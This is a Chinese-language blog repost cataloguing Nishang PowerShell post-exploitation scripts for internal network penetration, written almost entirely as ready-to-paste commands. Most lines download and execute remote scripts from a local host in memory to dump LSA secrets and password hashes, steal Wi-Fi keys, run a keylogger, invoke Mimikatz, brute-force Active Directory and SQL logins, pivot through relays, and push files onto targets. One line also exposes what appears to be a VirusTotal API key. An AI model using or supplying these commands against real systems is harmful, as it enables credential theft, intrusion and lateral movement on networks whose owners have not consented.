一些内网渗透所用Poweshell脚本(二)

admin 2021年12月29日07:05:13评论98 views字数 5180阅读17分16秒阅读模式

Get-Information

信息收集:包括运行窗口历史记录如:FTP访问、共享连接、

putty连接

驱动、应用程序、hosts文件、进程、无线网络记录:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Get-Information.ps1'); Get-Information"

一些内网渗透所用Poweshell脚本(二)

Get-LSASecret

从目标获取LSA机密。

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Get-LSASecret.ps1'); Get-LsaSecret"

Get-PassHashes

获取密码Hash:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Get-PassHashes.ps1'); Get-PassHashes"

Get-WLAN-Keys:

获取无线连接历史密码:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Get-WLAN-Keys.ps1'); Get-WLAN-Keys"

一些内网渗透所用Poweshell脚本(二)

Keylogger

键盘记录: (无测试)

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Keylogger.ps1'); Keylogger"

 

Invoke-MimikatzWdigestDowngrade

转储在Windows8.1和Server 2012的纯用户密码(测试失败)

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Invoke-MimikatzWDigestDowngrade.ps1'); MimikatzWDigestDowngrade"

 

Get-PassHints

获取Windows用户的密码提示从目标。

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Get-PassHints.ps1'); Get-PassHints"

Pivot

Create-MultipleSessions

检查在多台计算机证书,并创建PSSession中。:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Pivot/Create-MultipleSessions.ps1');  Create-MultipleSessions -filename .servers.txt"

例子:

PS > Create-MultipleSessions -filename .servers.txt
Above command uses the credentials available with current powershell session and checks it against multiple computers specified in servers.txt
 
.EXAMPLE
PS > Create-MultipleSessions -filename .servers.txt -Creds
Above command asks the user to provide username and passowrd to check on remote computers.
 
.EXAMPLE
PS > Create-MultipleSessions -filename .servers.txt -CreateSessions
Above command uses the credentials available with current powershell session, checks it against multiple computers specified in servers.txt and creates PSSession for those.

 

Run-EXEonRemote(没测试过)

运行EXEonRemote复制和多台计算机上执行的可执行文件。

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Pivot/Run-EXEonRemote.ps1');  Invoke-Command -FilePath .Run-EXEonRemote.ps1 -ComputerName (Get-Content .servers.txt)"

Invoke-NetworkRelay

Invoke-NetworkRelay Create network relays between computers.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Pivot/Invoke-NetworkRelay.ps1');  Invoke-NetworkRelay -Relay v4tov4 -ListenAddress 192.168.254.141 -Listenport 8888 -ConnectAddress 192.168.1.22  -ConnectPort 445 -ComputerName 192.168.254.141"

Prasadhak

Prasadhak

检查运行正在运行的进程对VirusTotal数据库的哈希值。

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Prasadhak/Prasadhak.ps1');  Prasadhak -APIKEY 1fe0ef5feca2f84eb450bc3617f839e317b2a686af4d651a9bada77a522201b0"

Scan

Brute-Force

爆力破解:FTP、活动目录、mssql、Sharepoint.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Scan/Invoke-BruteForce.ps1');  Invoke-BruteForce"

 例子:

.EXAMPLE
PS > Invoke-BruteForce -ComputerName SQLServ01 -UserList C:testusers.txt -PasswordList C:testwordlist.txt -Service SQL -Verbose
Brute force a SQL Server SQLServ01 for users listed in users.txt and passwords in wordlist.txt
 
.EXAMPLE
PS > Invoke-BruteForce -ComputerName targetdomain.com -UserList C:testusers.txt -PasswordList C:testwordlist.txt -Service ActiveDirectory -StopOnSuccess -Verbose
Brute force a Domain Controller of targetdomain.com for users listed in users.txt and passwords in wordlist.txt.
Since StopOnSuccess is specified, the brute forcing stops on first success.
 
.EXAMPLE
PS > cat C:testservers.txt | Invoke-BruteForce -UserList C:testusers.txt -PasswordList C:testwordlist.txt -Service SQL -Verbose
Brute force SQL Service on all the servers specified in servers.txt

Port-Scan

端口扫描:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Scan/Port-Scan.ps1');  Port-Scan -StartAddress 192.168.4.1 -EndAddress 192.168.4.254"

 例子:

.PARAMETER TimeOut
Time (in MilliSeconds) before TimeOut, Default set to 100
 
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254
 
.EXAMPLE  扫描整个段存活
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost
 
.EXAMPLE 扫描默认端口
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort
Use above to do a port scan on default ports.
 
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort -TimeOut 500
 
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.10.254 -ResolveHost -ScanPort -Port 80

实用脚本:

Download

下载文件到目标:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Utility/Download.ps1'); Download http://192.168.4.4/php.txt netfile.txt"

下载的默认路径

C:UsersAdministratorAppDataLocalTemp

导入全部当前脚本:

PS > Import-Module .nishang.psm1

PS > . C:nishangGatherGet-Information.ps1

PS > Get-Information

PS > Get-Help [scriptname] -full       //获取帮助

 

 

 


本文始发于微信公众号(关注安全技术):一些内网渗透所用Poweshell脚本(二)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月29日07:05:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一些内网渗透所用Poweshell脚本(二)http://cn-sec.com/archives/502671.html

发表评论

匿名网友 填写信息